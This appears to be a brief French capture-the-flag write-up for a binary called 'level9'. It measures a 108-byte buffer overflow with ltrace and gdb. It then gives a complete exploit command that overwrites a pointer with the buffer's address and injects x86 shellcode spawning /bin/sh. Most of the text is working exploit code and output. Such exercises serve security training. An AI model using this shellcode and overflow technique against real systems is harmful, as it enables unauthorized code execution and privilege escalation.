
./level9 $(python -c 'print "A" * 109')
Segmentation fault (core dumped)

$ ltrace ./level9 $(python -c 'print "A" * 108')
***                                                
memcpy(0x0804a00c, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"..., 108) 
--- SIGSEGV (Segmentation fault) ---
***

Nous avons un buffer de 108.

(gdb) r $(python -c 'print "A"*108 + "\x08\x04\xa0\x0c"[::-1]')
***
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()
***

On s'appercoit que le debut de la string est interprete comme une adresse.
Et que le programmme tente d'y acceder.

On lui place donc l'addresse du buffer, puis on y place un shellcode.

./level9 $(python -c 'print "\x08\x04\xa0\x0c"[::-1] + "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0\x0b\xcd\x80"  + "B" * 83 + "\x08\x04\xa0\x0c"[::-1]')
